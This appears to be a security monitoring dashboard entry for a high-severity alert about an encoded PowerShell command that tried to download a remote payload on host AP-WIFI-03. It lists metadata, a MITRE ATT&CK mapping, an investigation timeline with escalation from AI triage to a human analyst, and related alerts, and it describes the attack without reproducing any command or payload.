Suspicious PowerShell Execution

High Investigating

ALR-00500 · 2026-04-10T13:21:28Z

Description

Encoded PowerShell command executed on AP-WIFI-03 by user 'l.johnson'. Command attempts to download and execute remote payload. Flagged by DLP Module.

Alert Metadata

Alert ID: ALR-00500
Timestamp: 2026-04-10T13:21:28Z
Severity: High
Status: Investigating
Detection Source: DLP Module
Assigned Analyst: James Okonkwo

Endpoint Information

Hostname: AP-WIFI-03
User Account: l.johnson
Source IP: 185.33.220.206
Destination IP: 10.3.117.201
Origin Country: IN India

MITRE ATT&CK Mapping

Tactic: Execution
Technique: T1059.001
Reference: attack.mitre.org/techniques/T1059.001

Investigation Timeline

13:21:28 Event ingested by SOC365 Engine

13:21:32 EmilyAI triage started — correlation enrichment

13:21:33 EmilyAI confidence: 97% — escalated to human analyst

13:22:08 Alert assigned to analyst: James Okonkwo

13:24:03 Investigation started — querying SIEM and threat intelligence

Related Alerts

ID	Time	Alert	Severity	Status	Host
ALR-00157	2h ago	Suspicious PowerShell Execution	Medium	Resolved	WS-LAP-012
ALR-00447	4h ago	Shadow IT Discovery	Medium	False Positive	AP-WIFI-03
ALR-00354	4h ago	Suspicious PowerShell Execution	Informational	False Positive	WS-MAC-005
ALR-00467	17h ago	Malware Signature Match	Low	Open	AP-WIFI-03
ALR-00087	1d ago	Insider Threat Indicator	Informational	Investigating	AP-WIFI-03